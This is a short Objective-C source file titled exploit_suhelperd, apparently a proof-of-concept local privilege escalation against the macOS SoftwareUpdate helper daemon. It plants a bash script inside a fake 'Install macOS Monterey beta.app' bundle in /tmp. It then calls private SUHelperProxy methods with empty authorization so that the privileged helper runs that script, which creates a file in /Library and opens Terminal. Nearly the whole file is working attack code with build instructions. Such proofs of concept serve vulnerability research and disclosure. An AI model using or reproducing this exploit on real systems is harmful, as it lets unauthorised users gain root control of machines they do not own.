exploit.m

//
//  main.m
//  exploit_suhelperd
//
//  Created by mickey on 2022/1/21.
//

///  clang exploit.m -o /tmp/exploit -framework Foundation -fobjc-arc -fobjc-link-runtime /Applications/Xcode.app/Contents/Developer/Platforms/MacOSX.platform/Developer/SDKs/MacOSX.sdk/System/Library/PrivateFrameworks/SoftwareUpdate.framework/Versions/A/SoftwareUpdate.tbd

#import <Foundation/Foundation.h>

@protocol SUHelperDProtocol
// some protocol methods
@end

@interface SUHelperProxy : NSObject <SUHelperDProtocol>
{
    unsigned int _suhelperd_port;
    unsigned int _client_port;
    long long _currentRights;
    NSObject<OS_dispatch_queue> *_q;
    NSObject<OS_dispatch_source> *clientPortDeadChecker;
    long long _recentRights;
}

+ (id)sharedHelperProxy;
@property long long recentRights; // @synthesize recentRights=_recentRights;
- (void)authorizeWithEmptyAuthorizationForRights:(long long)arg1;
- (BOOL) prepareInstallAssistantWithPath:(NSString *)arg1;
- (id) installAssistantPreparationStatus;

@end

int main(int argc, const char * argv[]) {
    NSLog(@"preparing payload shell...");
    [@"#!/bin/bash\ntouch /Library/test_root\n/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal\n" writeToFile:@"/tmp/Applications/Install macOS Monterey beta.app/Contents/Frameworks/OSInstallerSetup.framework/Resources/osinstallersetupd" atomically:TRUE encoding:NSUTF8StringEncoding error:nil];
    
    // fire the hole
    NSLog(@"all ready, press enter to fire the hole.");
    getchar();
    
    SUHelperProxy *helper = [SUHelperProxy sharedHelperProxy];
    [helper authorizeWithEmptyAuthorizationForRights:4];
    
    id status = [helper installAssistantPreparationStatus];
    NSLog(@"installAssistantPreparationStatus:%@", status);
    // will hang inside, waiting for XPC response
    [helper prepareInstallAssistantWithPath:@"/tmp/Applications/Install macOS Monterey beta.app"];
    
    return 0;
}